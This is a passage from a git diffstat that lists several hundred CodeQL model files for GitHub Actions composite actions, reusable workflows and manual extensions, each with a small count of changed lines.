.../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 ++-- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- 
.../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 ++-- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- 
.../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- 
.../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- 
.../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- 
.../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- 
.../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 ++-- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- 
.../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- 
...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- 
.../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 ++-- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 ++-- .../ext/manual/8398a7_action-slack.model.yml | 2 
+- .../manual/AsasInnab_regex-action.model.yml | 2 +- .../ext/manual/MeilCli_regex-match.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- .../Steph0_dotenv-configserver.model.yml | 2 +- ...us_github-action-files-in-commit.model.yml | 2 +- .../manual/aarcangeli_load-dotenv.model.yml | 2 +- .../ab185508_file-type-finder.model.yml | 2 +- ...ons-ecosystem_action-regex-match.model.yml | 2 +- .../manual/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- .../manual/akefirad_loadenv-action.model.yml | 2 +- .../manual/akhileshns_heroku-deploy.model.yml | 4 ++-- ...bell_pull-request-comment-branch.model.yml | 2 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- .../ext/manual/anchore_sbom-action.model.yml | 2 +- .../ext/manual/anchore_scan-action.model.yml | 2 +- .../andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- .../ankitjain28may_list-files-in-pr.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- .../ext/manual/appleboy_ssh-action.model.yml | 2 +- ql/lib/ext/manual/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...aamMavridis_files-changed-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/manual/azure_cli.model.yml | 2 +- ql/lib/ext/manual/azure_powershell.model.yml | 2 +- .../ext/manual/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- .../manual/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 ++-- .../manual/bufbuild_buf-lint-action.model.yml | 4 ++-- .../bufbuild_buf-setup-action.model.yml | 2 +- .../c-py_action-dotenv-to-setenv.model.yml | 2 +- .../ext/manual/cachix_cachix-action.model.yml | 4 ++-- 
ql/lib/ext/manual/changesets_action.model.yml | 2 +- .../cloudflare_wrangler-action.model.yml | 2 +- .../cosq-network_dotenv-loader.model.yml | 2 +- .../manual/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- .../manual/cypress-io_github-action.model.yml | 2 +- .../dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- .../manual/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- .../devorbitus_yq-action-output.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- .../manual/docker_build-push-action.model.yml | 2 +- ...3d_action-extract-unique-matches.model.yml | 2 +- .../manual/eficode_resolve-pr-refs.model.yml | 2 +- ql/lib/ext/manual/endbug_latest-tag.model.yml | 2 +- .../manual/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- .../manual/gabrielbb_xvfb-action.model.yml | 2 +- .../manual/game-ci_unity-builder.model.yml | 2 +- .../game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- .../manual/getsentry_action-release.model.yml | 2 +- .../ext/manual/github_codeql-action.model.yml | 2 +- .../go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...tson_pull-request-comment-branch.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../gradle_gradle-build-action.model.yml | 2 
+- .../manual/haya14busa_action-cond.model.yml | 2 +- .../manual/hexlet_project-action.model.yml | 2 +- .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/manual/ilammy_setup-nasm.model.yml | 2 +- .../ext/manual/imjohnbo_issue-bot.model.yml | 2 +- .../ext/manual/iterative_setup-cml.model.yml | 2 +- .../ext/manual/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../jitterbit_get-changed-files.model.yml | 2 +- .../johnnymorganz_stylua-action.model.yml | 2 +- .../manual/jsdaniell_create-json.model.yml | 2 +- .../jsmith_changes-since-last-tag.model.yml | 2 +- .../jurplel_install-qt-action.model.yml | 2 +- .../ext/manual/jwalton_gh-ecr-push.model.yml | 4 ++-- .../kaisugi_action-regex-match.model.yml | 2 +- ...rpikpl_list-changed-files-action.model.yml | 2 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ql/lib/ext/manual/knu_changed-files.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- .../ext/manual/leafo_gh-actions-lua.model.yml | 2 +- .../leafo_gh-actions-luarocks.model.yml | 2 +- ...logs_gh-action-get-changed-files.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ...felipelaviola_parse-plain-dotenv.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- .../ext/manual/magefile_mage-action.model.yml | 2 +- .../manual/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- .../manual/marocchino_on_artifact.model.yml | 2 +- .../martinhaintz_ga-file-list.model.yml | 2 +- .../manual/mattdavis0351_actions.model.yml | 4 ++-- .../meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- .../manual/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/manual/mikefarah_yq.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/manual/msys2_setup-msys2.model.yml | 2 +- .../manual/mxschmitt_action-tmate.model.yml | 2 
+- .../manual/mymindstorm_setup-emsdk.model.yml | 4 ++-- .../nanasess_setup-chromedriver.model.yml | 2 +- .../ext/manual/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/manual/nick-fields_retry.model.yml | 2 +- .../manual/octokit_graphql-action.model.yml | 2 +- .../manual/octokit_request-action.model.yml | 2 +- .../ext/manual/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- ...ulschuberth_regex-extract-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- ...r-murray_issue-forms-body-parser.model.yml | 2 +- .../plasmicapp_plasmic-action.model.yml | 2 +- .../potiuk_get-workflow-origin.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/manual/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- .../ext/manual/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ql/lib/ext/manual/read-file-actions.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- .../ext/manual/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/manual/release-kit_regex.model.yml | 2 +- .../renovatebot_github-action.model.yml | 2 +- .../rishabh510_path-lister-action.model.yml | 2 +- .../roots_issue-closer-action.model.yml | 2 +- .../manual/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/manual/ruby_setup-ruby.model.yml | 4 ++-- ...ction-detect-and-tag-new-version.model.yml | 4 ++-- .../ext/manual/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- .../ext/manual/snow-actions_eclint.model.yml | 2 +- .../stackhawk_hawkscan-action.model.yml | 2 +- .../step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- .../the-coding-turtle_ga-file-list.model.yml | 2 +- 
